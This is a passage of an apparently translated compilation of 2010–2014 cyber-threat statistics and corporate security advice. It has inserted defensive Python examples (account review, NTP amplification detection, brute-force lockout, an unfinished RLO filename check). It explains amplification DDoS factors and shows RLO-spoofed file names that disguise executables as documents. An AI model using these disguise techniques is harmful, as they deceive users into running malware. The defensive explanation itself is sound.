Some malicious mobile programs duplicate the functionality of pre-existing threats, such as those that steal information from devices. However, sometimes something new appears. For example, in the days of dial-up modems, there were programs that dialed premium-rate 900 numbers belonging to hackers. Today, malware sends premium SMS messages, and the proceeds go to cybercriminals. In 2013, mobile technologies will develop further, which will create new opportunities for cyber intruders.
The increasingly popular eWallet technology will inevitably become another platform that attackers will try to use for their own purposes. And with the widespread adoption of mobile payment technologies, mobile devices will become even more valuable. By analogy with the Firesheep tool that hijacks other people's Wi-Fi sessions, we should expect the appearance of programs that intercept user payment information. Some payment systems are widely popular among technically inexperienced users and may have vulnerabilities that potentially lead to information theft.
2011
More data breaches, loss of devices, and how to take care of the future
Personal data of approximately 1.1 million people per successful attack was the average result in 2011, a sharp increase compared with previous years. Such incidents turned out to be a serious threat: in 2011, data on 187 million people were stolen. However, the most common cause of data leaks is the theft or loss of a laptop or other storage medium, such as a smartphone, flash drive or backup media. Such leaks disclosed the data of about 18.5 million people.
As tablet and smartphone sales continue to overtake PC sales, these devices will carry more and more confidential information every year. Employees bring their own smartphones and tablets and connect them to corporate systems even before the organization has time to implement protection and management of these devices. This can lead to an increase in the number of data leaks, since without proper protection the loss of a mobile device puts the information stored on it at risk. A recent study by Symantec shows that 50% of lost phones will not be returned to their owners, and in 96% of cases (including returned ones) data will be leaked.
Mobile threats hit businesses and individual users
In 2011, the number of mobile vulnerabilities increased by 93%. At the same time, there has been an increase in threats to the Android system. With the growing number of vulnerabilities for mobile devices, attackers not only adapt existing malware for mobile devices, but also create specialized malware that uses all the capabilities of the mobile platform. In 2011, mobile viruses for the first time presented a real threat to business and individual users. These threats are designed to collect data, share content, and track users.
Kaspersky Security Bulletin: Ranking of countries in terms of Internet surfing security
Kaspersky Lab experts prepared their traditional annual report on cyber threats, Kaspersky Security Bulletin 2011. Among its most revealing figures, the report said, is the degree of risk of infection that computers are exposed to when surfing the web in different countries of the world.
Analysts compiled a rating of the most dangerous states for Internet surfing, the leader of which in 2011 was Russia: more than 55% of unique Internet users in the country were subjected to web attacks.
Ranking of the most dangerous countries for Internet surfing
Source: Kaspersky Lab, 2012
Yuri Namestnikov, the author of the statistical report, noted that the statistics on encounters with cyber threats during web surfing "show the level of aggressiveness of the environment in which the computer works." In 2011, this figure grew by 2% worldwide and amounted to 32.3%.
Experts noted that in 2011 there were significant changes in the top three. Russia rose from third to first place (+2.2%). Oman remained in second place with 54.8%. The USA rose from fifth to third place with 50.1%. Over the year, the risk level for web surfing in Iraq decreased significantly, from 61.8% to 45.4%, and the country dropped from first to eighth place.
After the top three, the "top ten" most dangerous countries for Internet surfing were distributed as follows: Armenia, Belarus, Azerbaijan, Kazakhstan, Iraq, Ukraine, Guinea-Bissau.
Kaspersky Lab ranks all countries in the rating by the degree of risk of infection when surfing the Internet. The "High Risk Group" (41-60%) includes 22 countries, led by Russia. 118 countries fell into the "Risk Group" (21-40%), including Italy (38.9%), UAE (38.2%) and France (37%).
The "Safest Internet Surfing Group of Countries" (0-20%) includes 9 countries: Ethiopia (20.5%), Haiti (20.2%), Denmark (19.9%), Niger (19.9%), Togo (19.6%), Burundi (18.6%), Zimbabwe (18.6%), Benin (18.0%) and Myanmar (17.8%). Germany, Japan, Luxembourg, Austria and Norway had figures in the 19% to 20% range in 2010.
With the exception of Denmark, the group of safe countries consists almost entirely of newcomers to the ranking, developing countries in Africa and Asia. Their entry into this group is explained by the way files are distributed in these countries: the Internet is not yet well developed there, and removable media are actively used to exchange files.
Top 20 countries by the number of malware posted on resources
According to Kaspersky Lab, in 2011 attackers used 4,073,646 domains to carry out 946,393,693 attacks over the Internet. Servers hosting malicious code were located in 198 countries. 86.4% of all malicious hosting recorded on the Web was located in the Internet space of twenty countries. Of these, Russia accounted for 14.6% of all attacks, second place after the USA. The Netherlands, Germany, Ukraine, China, Great Britain and others follow in the number of outgoing attacks.
Source: Kaspersky Lab, 2012
The researchers noted that although the first two positions were occupied by the same countries as a year earlier, the active growth in the share of malicious hosting recorded in these countries in previous years has stopped. This was helped by active law enforcement action to close botnets. However, although the percentage of malicious hosting in these countries decreased slightly, it still remains at a very high level, experts said.
Ranking Countries on Cyber Threat Preparedness
Sweden, Finland and Israel were named the countries best prepared for cyber attacks. This was stated in a study by McAfee and the Security & Defense Agenda (SDA).
The report rates 23 countries in terms of their readiness to repel cyber threats; the maximum rating of 5 stars went to no one this year. In second place after the leaders were eight countries, including the United States, Great Britain, France and Germany, which received 4 stars.
A rating of 3.5 stars went to Australia, Canada, Japan and Austria; 3 stars were received by Italy, China, Poland and Russia; 2.5 stars each went to Brazil, India and Romania. Mexico came last with only 2 stars.
Top 23 world countries in terms of cyber security
Source: McAfee, January 2012
According to Phyllis Schneck, Chief Technology Officer of McAfee, "evil is much faster than good," and that is why no country was able to get the highest assessment.
As for Russia, most experts find it very difficult to set aside its reputation as "a country engaged in cyber espionage." In October 2011, officials of the counter-terrorism committee of the United States, speaking before Congress, stated that Russia poses a "permanent threat to US economic security." According to one of the experts, "Russia is a country of thugs with great hackers."
Vladimir Chizhov, Russia's permanent representative to the European Union, then criticized this position. "This type of threat can be successfully carried out only on the basis of international cooperation," he said.
Meanwhile, the report said some of Russia's efforts to regulate cyber security are having a positive effect. These are new legislative acts protecting personal data, the development of digital signatures, and a change in the procedure for registering domain names (previously carried out without any verification).
2010: Symantec Data
In 2010, Symantec discovered more than 286 million new threats. This huge number of threats was accompanied by the emergence of several important new trends. Firstly, in 2010 there was a sharp increase in both the frequency and sophistication of targeted attacks on enterprises. Secondly, attackers began to use social networks as platforms for spreading attacks. Thirdly, attackers changed their tactics: they increasingly exploited Java vulnerabilities to hack traditional computer systems. Finally, there was a sharp increase in fraudsters' interest in mobile [49]
Year of targeted attacks
Targeted attacks such as Hydraq and Stuxnet posed a growing threat to businesses in 2010. To successfully and imperceptibly penetrate the computer networks of enterprises, attackers used previously unknown vulnerabilities (the so-called zero-day vulnerabilities). And, for example, Stuxnet used four such vulnerabilities at once to carry out an attack.
In 2010, attackers targeted a wide range of large multinationals and government agencies, as well as surprisingly many small companies. Often, attackers collected information about specific employees of the targeted corporation and then developed an individual approach to that victim (mainly using social engineering methods) to gain access to the victim company's network. Thanks to this targeted nature, many of these attacks succeeded even against organizations where basic security measures were observed.
The highly publicized targeted attacks of 2010 aimed to steal intellectual property or cause physical damage. However, many lesser-known targeted attacks also targeted individuals to gain access to their personal information. According to the report, in 2010 one successful hack on average exposed the personal data of 260,000 people.
Social media: fertile ground for cyber crime
The popularity of social media continues to grow, and malware creators could not ignore it. Most often, attackers use short URLs, which are normally used to reduce the number of characters in a message on X (formerly Twitter) or to make a long link on a site or in a letter look neater. In 2010, scammers spread millions of such links on social networks in order to lure users to phishing sites or infect them with a virus or other malware. This caused an increase in the number of successful infections.
The report notes that attackers have maximized the capabilities of news feeds of popular social networks for massive malicious activities. A typical scenario looked like this: an attacker logs into a hacked social network account and posts a short link to a malicious website in status. The social media site then automatically sends the link to the victim's friends' news streams, thus spreading it to hundreds or thousands of victims within minutes. Symantec recorded that in 2010, 65% of malicious links in news streams used short URLs. Of these, 73% were clicked more than 10 times, and 33% - from 11 to 50 times.
Ready-made attack tools focused on Java
Exploit kits are computer programs that both advanced hackers and beginners can use to launch large-scale attacks more easily. Such tools were widely used in 2010 and increasingly exploited Java vulnerabilities, which accounted for 17% of all web browser plugin vulnerabilities in 2010. As a popular multi-platform technology that is not tied to a browser type, Java remains an attractive target for cybercriminals.
The Phoenix kit was the basis for most web attacks carried out in 2010. Like many other kits, it contains components that exploit Java vulnerabilities. During the reporting period, the top 6 web attacks exploited Java vulnerabilities.
The number of web attacks recorded daily in 2010 increased by 93% compared to 2009. Since two-thirds of all these threats were created using off-the-shelf toolkits, Symantec said, the toolkits are the likely cause of such a sharp increase.
The scheme of actions of attackers in the mobile space is being clarified
The ubiquity of mobile platforms has reached a level where attackers simply cannot ignore it. Symantec therefore expects an increase in the number of attacks on these platforms. In 2010, mobile devices were attacked mainly by Trojan programs disguised as legitimate applications. Although some of these programs were developed by cybercriminals "from scratch," in many cases users were infected by malicious code inserted into original official applications. The attackers then distributed these infected apps through public online stores. This is the method used, for example, by the authors of the Pjapps Trojan.
Although the new security architectures used in modern mobile devices are no less effective than those of desktop computers and servers, attackers often manage to bypass this protection by exploiting internal vulnerabilities of mobile platforms. Unfortunately, such flaws are quite common: during 2010, Symantec discovered 163 vulnerabilities that attackers could exploit to gain partial or complete control over devices running popular mobile platforms. In the first months of 2011, attackers already took advantage of these flaws to infect hundreds of thousands of devices.
Threat Landscape - Basic Figures and Facts
- 286 million new threats - 2010 was characterized by a great diversity of malware as well as the emergence of new mechanisms for its spread, which caused a further increase in the number of malicious technologies. In 2010 Symantec encountered more than 286 million unique malware variants;
- The number of web attacks increased by 93% - The number of ready-made tools for carrying out web attacks increased by 93% in 2010. This was also facilitated by the widespread use of short URL services;
- 260,000 "victims" per successful attack - This is the average number of people whose personal data ended up in the public domain after a hack in 2010;
- 14 new zero-day vulnerabilities - zero-day vulnerabilities have played a key role in targeted attacks such as Hydraq and Stuxnet. Only Stuxnet exploited four different zero-day vulnerabilities;
- 6,253 new vulnerabilities - In 2010, Symantec documented more vulnerabilities than in any previous reporting period;
- The number of detected mobile vulnerabilities increased by 42% - A sign that cybercriminals are beginning to focus on the mobile space was an increase in the number of recorded new vulnerabilities in mobile operating systems from 115 in 2009 to 163 in 2010;
- 1 botnet with more than 1 million spambots - In 2010, there was a period when Rustock, the largest botnet observed in 2010, controlled more than one million bots. Other botnets - such as Grum and Cutwail - were not far behind, controlling many hundreds of thousands of bots each;
- 74% of spam was related to pharmaceutical products - In 2010, approximately three quarters of all spam was advertising for pharmaceuticals;
- $15 for 10,000 bots - Monitoring shadow market ads in 2010, Symantec found 10,000 bots selling for as little as US$15. Bots are usually used to send spam and distribute fake software, but recently they have been increasingly used for DDoS attacks.
- From $0.07 to $100 per credit card - In 2010, prices for credit card details on underground forums varied in a wide range. Factors that dictated the price were the rarity of the card and discounts on wholesale purchases.
Measures against cybercriminals
To effectively counter this threat, which has grown so dramatically in recent years, companies need to treat information security as one of the key components of their operations. Top priority should go to the question of responsibility. Once the information security problem has become strategically important, the company's board members should pay paramount attention to solving this difficult problem.
One of the first important steps should be the introduction of the position of director of information security into the company's organizational structure. The Director of Information Security or Head of Security is generally not on the board, but must have direct access to it and report either directly to the board or to an officer at most one level below the board in the hierarchy. The Information Security Director is obliged to inform senior managers of the importance of information security measures and to ensure the allocation of the necessary resources. The next decision made at the company's management level is to list the data and systems whose protection is paramount. After identifying the departments and systems that need protection, scenarios for countering attacks are developed, taking into account the list of potential attackers, their goals, and their time and financial resources. Along with this, after a risk assessment, an information security management system should be implemented.
It is important that all departments are properly involved in all of these steps. Another significant point is awareness work among the organization's staff. Each employee must have basic knowledge of information security; in that case it will be possible to counter at least the simplest tricks often used by attackers, such as sending malware in email attachments. Technology alone is not enough; its role is only to help people make the right decisions and take the right actions.
Install Firewall
Every firm (including small ones) must have a firewall that restricts access to its network. This is your first line of defense.[50]
Ensure access control
The use of the Internet by office employees should be carefully monitored. In addition, organizations must have an antivirus and content-filtering gateway, which becomes their second line of defense.
Conduct regular checks
Network administrators or managers should review all user accounts and data access rights every month, or at least once a quarter.
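The periodic review recommended above is easiest when it is driven by data rather than by eyeballing a user list. The following script is an added example, not part of the original article or of any vendor's product: it compares two constructed directory snapshots (the previous review and the current state) against a constructed HR roster and reports the four things a reviewer most wants to see, namely new privileged group memberships, enabled accounts that have not logged in for a long time, accounts with no matching person, and disabled accounts that still hold privileged groups. The group names, user names and dates are invented for illustration.

```python
from datetime import date

# Constructed sample data (not from the page): the HR roster and two
# snapshots of the directory, as a monthly or quarterly review would compare.
PRIVILEGED_GROUPS = {"Domain Admins", "db_admins"}
HR_ROSTER = {"asmith", "bjones", "cwu", "dlee"}
REVIEW_DATE = date(2024, 4, 1)

PREVIOUS = {
    "asmith": {"groups": {"staff"}, "last_login": date(2024, 3, 1), "enabled": True},
    "bjones": {"groups": {"staff", "db_admins"}, "last_login": date(2024, 3, 2), "enabled": True},
    "cwu": {"groups": {"staff"}, "last_login": date(2023, 11, 5), "enabled": True},
    "dlee": {"groups": {"staff", "db_admins"}, "last_login": date(2024, 2, 20), "enabled": True},
    "svc_backup": {"groups": {"Domain Admins"}, "last_login": date(2024, 3, 1), "enabled": True},
}
CURRENT = {
    "asmith": {"groups": {"staff", "Domain Admins"}, "last_login": date(2024, 3, 28), "enabled": True},
    "bjones": {"groups": {"staff", "db_admins"}, "last_login": date(2024, 3, 29), "enabled": True},
    "cwu": {"groups": {"staff"}, "last_login": date(2023, 11, 5), "enabled": True},
    "dlee": {"groups": {"staff", "db_admins"}, "last_login": date(2024, 2, 20), "enabled": False},
    "svc_backup": {"groups": {"Domain Admins"}, "last_login": date(2024, 3, 30), "enabled": True},
    "ex_emp": {"groups": {"staff"}, "last_login": date(2024, 3, 30), "enabled": True},
}


def review_accounts(previous, current, roster, today, stale_days=90):
    """Compare two directory snapshots and return the findings a reviewer
    should look at. Every list is sorted so the report is stable."""
    findings = {
        "new_privileged": [],       # gained a privileged group since the last review
        "stale": [],                # enabled but unused for more than stale_days
        "orphaned": [],             # no matching person in the HR roster
        "disabled_privileged": [],  # disabled, yet still a member of a privileged group
    }
    for user, rec in current.items():
        privileged = rec["groups"] & PRIVILEGED_GROUPS
        previously = previous.get(user, {}).get("groups", set()) & PRIVILEGED_GROUPS
        if privileged - previously:
            findings["new_privileged"].append(user)
        if rec["enabled"] and (today - rec["last_login"]).days > stale_days:
            findings["stale"].append(user)
        if user not in roster:
            findings["orphaned"].append(user)
        if not rec["enabled"] and privileged:
            findings["disabled_privileged"].append(user)
    return {key: sorted(users) for key, users in findings.items()}


if __name__ == "__main__":
    report = review_accounts(PREVIOUS, CURRENT, HR_ROSTER, REVIEW_DATE)
    for key, users in report.items():
        print(f"{key}: {', '.join(users) or '-'}")
```

Service accounts such as `svc_backup` will always show up as orphaned under this rule; that is intentional, since every such account should have a named owner recorded somewhere, and the review is the moment to check it.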
Don't forget about physical protection
Protection is not limited to data inside the computer. Organizations must also physically protect their equipment. All visitors to your office should be accompanied by a member of staff, and monitor screens should not be visible from the corridor.
Passwords must be secure
Organizations must ensure that strong passwords are chosen; this means a certain level of complexity and periodic change. A password based on your mother's maiden name is no good.
Don't skimp!
If you can afford it, hire a data protection specialist (or several). In addition, the budget should provide money for equipment and software to protect against cybercriminals.
Teach staff vigilance
Office staff need to be taught vigilance. A few simple rules can significantly improve security in your company: never go directly to an unknown website whose address was sent to you by mail, delete any dubious letters and never click links sent to you. Instead, search for the topic on Google and find the site you need from there.
Integrated approach
Many of the techniques used earlier in attacks on home users are now being used against businesses. These are modified banking Trojans that target employees of finance and accounting departments, and various file-encrypting programs that have begun to operate inside corporate networks. In addition, network worms have gained popularity, and removing them requires shutting down the entire corporate network. When companies with many branches in different time zones encounter such a problem, the network shutdown inevitably leads to financial losses[51].
According to a 2014 Kaspersky Lab survey of information security specialists, Russian companies most often face malware, spam and phishing. Internal threats deserve separate mention: the most serious problems are caused by vulnerabilities in installed software, as well as accidental data leaks caused by employees and the work of insiders.
Don't trust the "kings" of social engineering
No technical means will protect against social engineering methods. Crackers collect data armed with knowledge of human psychology. They send malicious links to a "new track by your favourite band" on social networks, or send the accountant a letter with an attachment called "reconciliation act" in which a virus is actually hidden.
A separate direction in this area is the so-called "Nigerian spammers." They send letters asking for help with banking transactions involving the transfer of money allegedly subject to a large tax, report the recent death of a very rich person "with the same surname" as the recipient, and offer to help obtain money from the deceased's bank account.
The only counter to such attacks is to ignore the message completely. Even if a user enters into correspondence with this kind of scammer just to write a refusal, he thereby confirms that his email address is live. Attackers can subsequently use it for other, more ingenious mailings.
Regular training of all company employees in safe work on the Internet, and informing them about existing types of threats, helps to counter attacks that use social engineering methods.
Protect against DDoS attacks, viruses, Trojans, and phishing
The number of powerful DDoS attacks is growing rapidly. Such attacks can take the company's website down for a long time and deprive its owner of income. A study by Arbor Networks says that in the first half of 2014, more than 100 incidents with a capacity of more than 100 Gb/s were recorded. The number of attacks above 20 Gb/s in Q2 was twice the figure for the entire previous year.
This is also confirmed by Kaspersky Lab data, which in the spring of 2014 recorded a new jump in the power of DDoS attacks on the Runet. In the spring, a group of attackers organized a serious attack, choosing several sites of leading Russian banks, large companies and government agencies as targets. The average attack power was 70-80 Gb/s, and at peak moments exceeded 100 Gb/s. These figures set a record for the Runet: just a year earlier, the most powerful DDoS attack in the Russian segment of the network did not exceed 60 Gb/s.
The significant increase in the power of DDoS attacks is due to the spread of a new method among attackers, NTP amplification. Its advantage is a large amplification factor (up to 556 times), which lets attackers quickly achieve high attack power with minimal effort. For comparison, the sensational attacks a year earlier used DNS amplification, whose factor is 10 times lower, up to 54 times. In addition, amplification lets attackers hide their real address, making them difficult to identify.
Providing protection against DDoS attacks in-house is a difficult task for large businesses and almost unfeasible for the SMB sector. The company must have the necessary resources, both human and material: two dedicated specialists working in shifts, expensive equipment and a connection to high-speed communication channels. It should be borne in mind that DDoS is not a constant threat; you must be prepared for the equipment to stand idle and the specialists' work to go unused. Therefore, it is often more profitable to use the services of third-party companies that specialize in protection against such attacks by connecting to their cloud services.
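The amplification factor discussed above is simply the number of bytes a reflector sends to the victim per byte it received, and that ratio is also the easiest thing for the operator of an NTP server (or of the network in front of it) to monitor. The script below is an added example, not code from the original article or from any of the vendors it quotes; it runs over constructed NetFlow-style records (the addresses, ports and byte counts are invented for illustration) and flags any server-to-client pair on UDP port 123 whose outbound bytes exceed inbound bytes by more than a chosen factor, then totals the amplified traffic per flagged destination.

```python
from collections import defaultdict

# Constructed flow records (NetFlow-like), not from the page:
# (src_ip, src_port, dst_ip, dst_port, bytes). 203.0.113.7 plays the victim
# whose address is forged in the requests; 198.51.100.x are NTP servers
# being abused as reflectors; 192.0.2.5 is an ordinary NTP client.
FLOWS = [
    ("203.0.113.7", 40000, "198.51.100.10", 123, 234),
    ("198.51.100.10", 123, "203.0.113.7", 40000, 48200),
    ("203.0.113.7", 40001, "198.51.100.20", 123, 234),
    ("198.51.100.20", 123, "203.0.113.7", 40001, 46800),
    ("192.0.2.5", 50000, "198.51.100.10", 123, 48),
    ("198.51.100.10", 123, "192.0.2.5", 50000, 48),
]


def amplification_factor(request_bytes, response_bytes):
    """Bandwidth amplification factor: bytes delivered to the victim per
    byte the sender had to transmit."""
    return response_bytes / request_bytes


def find_reflection(flows, service_port=123, min_factor=10.0):
    """Pair each server->client flow with the client->server flow on the same
    service port and report pairs whose byte ratio looks like amplification."""
    to_server = defaultdict(int)
    from_server = defaultdict(int)
    for src, sport, dst, dport, nbytes in flows:
        if dport == service_port:
            to_server[(dst, src)] += nbytes
        elif sport == service_port:
            from_server[(src, dst)] += nbytes
    findings = []
    for (server, client), out_bytes in from_server.items():
        in_bytes = to_server.get((server, client), 0)
        # A response with no matching request at all is the extreme case.
        factor = amplification_factor(in_bytes, out_bytes) if in_bytes else float("inf")
        if factor >= min_factor:
            findings.append((server, client, round(factor, 1)))
    return sorted(findings)


def victim_totals(findings, flows, service_port=123):
    """Bytes of amplified traffic received by each client flagged above."""
    victims = {client for _, client, _ in findings}
    totals = defaultdict(int)
    for src, sport, dst, _, nbytes in flows:
        if sport == service_port and dst in victims:
            totals[dst] += nbytes
    return dict(totals)


if __name__ == "__main__":
    hits = find_reflection(FLOWS)
    for server, client, factor in hits:
        print(f"{server} -> {client}: x{factor}")
    print(victim_totals(hits, FLOWS))
```

The ordinary client in the sample produces a ratio of 1.0 and is never reported. On the mitigation side, the same two numbers point at the two fixes: the operator of a reflector reduces the response size (by disabling or rate-limiting the oversized query on the server), and the operator of the network the forged requests come from prevents the spoofed source addresses from leaving it (ingress filtering as described in BCP 38).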
PHP site owners
To protect their companies' resources, business owners should remember that, according to a recent study by Positive Technologies, the least secure sites are written in PHP: 76% of them contain critical vulnerabilities. Web resources in Java (70%) and ASP.NET (55%) were less vulnerable.
Accordingly, the sites most exposed to attacks should take more care over their security level. For example, it is worth strengthening protection against guessing of user identifiers or passwords (brute-force attacks).
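Protection against password guessing mostly comes down to counting failures per source over a sliding window and refusing further attempts for a while once a threshold is crossed. The code below is an added example and is not from the original article or from any framework; it is written in Python rather than PHP so that it runs stand-alone, but the logic ports directly to a PHP login handler. It feeds a constructed login log (timestamps, user names and addresses are invented) through a guard object that decides, per attempt, whether to check the password, count the failure, lock the address or reject the attempt outright, and also records how many distinct user names each address tried, which separates a user who forgot a password from a source cycling through accounts.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed login log (not from the page). One address hammers several
# accounts; an ordinary user mistypes once and then succeeds.
SAMPLE_LOG = """\
2014-10-01 10:00:01 LOGIN FAIL user=admin ip=203.0.113.5
2014-10-01 10:00:02 LOGIN FAIL user=admin ip=203.0.113.5
2014-10-01 10:00:03 LOGIN FAIL user=root ip=203.0.113.5
2014-10-01 10:00:04 LOGIN FAIL user=test ip=203.0.113.5
2014-10-01 10:00:05 LOGIN FAIL user=admin ip=203.0.113.5
2014-10-01 10:00:06 LOGIN FAIL user=admin ip=203.0.113.5
2014-10-01 10:05:00 LOGIN FAIL user=ivanov ip=192.0.2.44
2014-10-01 10:05:20 LOGIN OK user=ivanov ip=192.0.2.44
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) LOGIN (?P<result>OK|FAIL) "
    r"user=(?P<user>\S+) ip=(?P<ip>\S+)$"
)


class BruteForceGuard:
    """Sliding-window failure counter with a temporary per-address lockout."""

    def __init__(self, max_failures=5, window=timedelta(minutes=10),
                 lockout=timedelta(minutes=30)):
        self.max_failures = max_failures
        self.window = window
        self.lockout = lockout
        self.failures = defaultdict(deque)   # ip -> timestamps of recent failures
        self.blocked_until = {}              # ip -> datetime the lockout expires
        self.users_tried = defaultdict(set)  # ip -> distinct user names attempted

    def is_blocked(self, ip, now):
        until = self.blocked_until.get(ip)
        return until is not None and now < until

    def attempt(self, now, ip, user, success):
        """Feed one login attempt; returns what the application should do."""
        if self.is_blocked(ip, now):
            return "rejected"          # refuse without even checking the password
        if success:
            return "ok"
        recent = self.failures[ip]
        recent.append(now)
        while recent and now - recent[0] > self.window:
            recent.popleft()           # forget failures older than the window
        self.users_tried[ip].add(user)
        if len(recent) >= self.max_failures:
            self.blocked_until[ip] = now + self.lockout
            recent.clear()
            return "locked"
        return "fail"


def analyse_log(text, guard=None):
    """Replay a log through the guard and summarise what it would have done."""
    guard = guard or BruteForceGuard()
    rejected = 0
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        if guard.attempt(ts, m["ip"], m["user"], m["result"] == "OK") == "rejected":
            rejected += 1
    return {
        "blocked_until": dict(guard.blocked_until),
        "rejected": rejected,
        "distinct_users": {ip: len(users) for ip, users in guard.users_tried.items()},
    }


if __name__ == "__main__":
    print(analyse_log(SAMPLE_LOG))
```

A per-address lockout alone can be turned against legitimate users who share a NAT address, so in practice it is combined with per-account throttling, a challenge after a few failures and, where possible, a second factor; the guard above is the building block, not the whole policy.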
Signed certificates
Corporate network administrators must control which applications employees use and which sites they visit; those sites must have valid, signed SSL certificates. These certificates come in three validation types: domain validation only, domain and organization validation, and extended validation. The best option is a certificate with extended validation, which has the so-called "green bar": when a visitor opens a site with such a certificate, a green bar with the name of the organization that received the certificate appears in the browser's address bar.
Most recently, users were exposed to the risk of improperly validated SSL certificates when at least 350 mobile apps in the Google Play and Amazon stores were found vulnerable to man-in-the-middle attacks. In such an attack, the cracker, having inserted himself into the channel between the parties, can obtain the transmitted information. For example, a hacker can intercept the credit card data of users of mobile applications that involve electronic payments.
Be alert
Although technology raises the security level of a computer, vigilance still matters, for example when handling email. Attackers often pose as travel services such as Airbnb and Booking.com, or write on behalf of airlines: they tell the user that a plane ticket has been charged to his credit card and offer a link to a phishing site where he can supposedly see the details of the upcoming flight.
In September 2014, Kaspersky Lab noted that "Nigerian" letters had begun to mention Ebola patients in Africa and unusual invitations to a World Health Organization (WHO) conference. The aim of the fraudsters, as usual, was to extract money from gullible recipients who entered into correspondence with the senders.
In October 2014 it was the turn of cybercriminals using the hype around Ebola to send malicious emails, again with WHO listed as the sender. In the letters found by researchers, the attackers tried to convince the recipient that WHO had prepared a file with general information and precautions that would help protect the user and others from the deadly virus and other diseases.
Besides exploiting topical subjects, spammers also send fake receipts from online stores that bill for a completed purchase which can supposedly only be cancelled on a phishing site. The phishing statistics are not comforting: Kaspersky Lab's anti-phishing system registered almost 19 million detections in September 2014 alone.
In today's conditions, companies need a set of software and hardware tools that provide an acceptable level of infrastructure security while keeping business processes efficient. These tools include antivirus software, intrusion prevention systems, firewalls, device control and Internet access control modules, data encryption, mobile device management, protection for mail servers and collaboration systems, and so on.
It is also important to remember that information security does not end with deploying protective tools: employees must be trained regularly in the rules for safe handling of electronic information, and correct policies and rules for working with confidential data must be put in place. Users should keep the golden rules in mind: do not follow dubious links, choose complex passwords for accounts, do not open attachments in unexpected letters and, of course, run comprehensive protection on the computer.
Key types of Internet threats
The pace of innovation in this contest between "offensive" and "defensive" technologies is very high. More than 100,000 new malware samples appear every day. Some malicious software modules now sell for more than a million dollars; cybercriminals are willing to pay such sums because they are confident the investment will pay off very quickly.
Another threat to information security is the new arms race unfolding in cyberspace, in which sabotage and cyber attacks are carried out. The disclosure in 2013 of PRISM, the world's largest known intelligence collection program, significantly undermined trust in large cloud service providers based in the United States. Trust declined especially in Europe, where data protection has traditionally received strong attention. According to the Information Technology and Innovation Foundation (ITIF, Washington, DC), US-based cloud service providers could as a result lose between $22 billion and $35 billion in revenue from 2014 to 2016.
Spam - alongside traditional advertising mailings there is malicious spam, for example messages carrying spyware or luring users to sites with malicious content.
Targeted phishing - unlike mass spam, targeted phishing is aimed at narrow groups of users and contains messages with a social context urging the potential victim to open an executable file or visit a site hosting malicious code.
PDF attacks - in recent years many serious vulnerabilities have been found in PDF readers, exploited through specially crafted PDF documents.
SEO (search engine optimization) poisoning - attackers manipulate search rankings so that sites hosting malicious code appear near the top of the results for queries about a major event, such as a world championship. Up-to-date gateway antivirus and intrusion prevention systems help protect against such threats.
Loss of productivity - administrators can use traffic management or content filtering systems to restrict or block access to online resources.
Social media - analysts warn of malware that spreads through popular social networks. Content filtering and file blocking solutions must be configured to minimize these threats.
According to IBM X-Force, the main source of threats remains popular software such as web browsers. A new development in recent years is the shift of attackers' efforts from browsers to web applications, through which the particularly valuable corporate databases can be reached directly. The share of vulnerabilities that get fixed is consistently low: up to 60% of the vulnerabilities discovered in a year still have no vendor patch at the end of that year.
The accounts most at risk are those of privileged users, that is, system administrators. Today, control over the actions of privileged users is a mandatory requirement of various standards and regulators. Attacks on these accounts can come both from outside the company and from unscrupulous employees. The growth in privileged-user threats includes insider threats, where employees either deliberately steal data from their company or inadvertently allow others to do so.
The 419 fraud scheme is being revived under the "FBI" name (according to Trend Micro).
Computer criminals have come up with another way to attract users' attention: this time they impersonate employees of the Federal Bureau of Investigation (USA) in Washington and attempt fraud through spam.
As in any other fraud attempt, the sender of the email impersonates someone else, in this case claiming to write from the FBI. The message informs the recipient that he is entitled to a payment of $10.5 million, and the fraudster posing as an FBI employee instructs him to contact the head of the "Internet transfer department" of United Trust Bank London, who is said to be the only person able to approve the multi-million dollar payment. The message adds that all recipients must follow the instructions for submitting a payment application exactly. All of this is, of course, false. The note at the end of the message is especially ironic and shows how far cybercriminals will go to succeed: it advises the recipient to beware of scammers who may try to contact him. To avoid becoming a victim of such fraud, always pay attention to the smallest details in the messages you receive; one close look is usually enough to tell a genuine message from a fake.
The SASFIS Trojan uses a new trick (according to Trend Micro).
In early 2010, the SASFIS Trojan, sent in fake emails purportedly from Facebook, gained notoriety. A SASFIS infection leads to the installation of a large number of other malware: this family opens systems to botnets, notably ZeuS and BREDOLAB, and is associated with various fake antivirus variants, usually those tied to pornographic sites.
TrendLabs engineers discovered a new version of SASFIS that uses the right-to-left override (RLO) method, a Unicode control character that reverses the display order of the text that follows it. The trick was previously popular among spammers and is now being used as a social engineering tactic.
The SASFIS Trojan is distributed through spam as a .RAR archive containing what looks like an .XLS file. After extraction, the file looks like a typical MS Excel document. In fact it is a screen saver executable, which Trend Micro detects as TROJ_SASFIS.HBC. It activates BKDR_SASFIS.AC, which injects malicious threads into the legitimate svchost.exe process. Although the file is shown as an Excel document, it carries a Win32 executable header, which only executable files have. The real file name (Chinese characters omitted) is: phone & mail)[U+202E]slx.scr, where U+202E is the Unicode control character that tells the system to render the characters that follow it from right to left. The user therefore sees the name as phone & mail)rcs.xls, which makes him believe it is indeed an Excel file and therefore "safe" to open, whereas in reality it is an executable .SCR file.
The same method works with other file names, for example BACKS[U+202E]FWS.BAT and I-LOVE-YOU-XOX[U+202E]TXT.EXE, which are displayed as BACKSTAB.SWF and I-LOVE-YOU-XOXEXE.TXT. In the first case a batch file is disguised as an Adobe Flash (.SWF) file; in the second an executable is disguised as a text file.
To prevent this attack, users can rely on proven precautions: do not open suspicious emails or download applications that arrive as executable files. On the defensive side, mail gateways and endpoint tools can flag or strip attachments whose names contain bidirectional control characters such as U+202E, since such characters rarely have a legitimate use in a file name.
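The RLO trick described above, and the gateway check that catches it, as an added example (editorial code, not from Trend Micro or from the page's sources). It reproduces the three file names from the text as constructed samples (the `\u202e` escape is the U+202E character) and adds two ordinary attachment names; the function names, the verdict labels and the list of executable extensions are assumptions.

```python
# Names of the Unicode bidirectional control characters that can be abused
# in file names. RLO (U+202E) is the one the SASFIS spam used.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF", "\u202d": "LRO",
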